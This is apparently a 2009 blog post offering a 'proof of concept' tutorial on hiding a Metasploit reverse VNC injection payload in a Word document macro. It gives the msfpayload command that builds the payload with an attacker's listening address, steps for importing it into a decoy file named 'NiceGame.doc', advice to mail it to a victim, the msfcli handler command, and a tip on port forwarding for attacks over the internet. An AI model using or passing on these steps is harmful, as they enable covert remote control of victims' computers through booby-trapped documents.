Sunday, May 24, 2009

Metasploit & Reverse VNC Injection hidden in word file -PoC (Proof of Concept)

Hello friends, today I'm going to show how to use Metasploit v3.2 payload feature for Reverse VNC Injection, The steps are given below,

Lets begin

1) Create a payload for ReverseVNCInjection with Metasploit's msfpayload utility,
./msfpayload windows/vncinject/reverse_tcp LHOST=172.16.107.44 V > exploit.bas

2) Copy exploit.bas file to another windows system to make .doc file,
Create New doc file --> write some text into it, then do the following ,
go to tools–>macro–>visualbasic editor.
then go to File–>import file–> and choose the exploit.bas and save it with a name ex: NiceGame.doc
Now file is ready, send this file to victim via mail or by some other ways,

3)Now in Backtrack-4, type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=172.16.107.44 DisableCourtesyShell=True E

On target windows system, when victim open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the Backtack.

Note : There is no required of VNC installed in the Victim PC; you can also do this in WAN also, only thing is that you should port forward your 4444 port in modem or router.

Original Video links for the above guide,
http://blip.tv/file/1847504
http://wirelesspunter.blip.tv

1 comment:

Sikadista said...

you should put credits to people dude!

just like this:

Credits goes to Punter of forum.darkc0de.com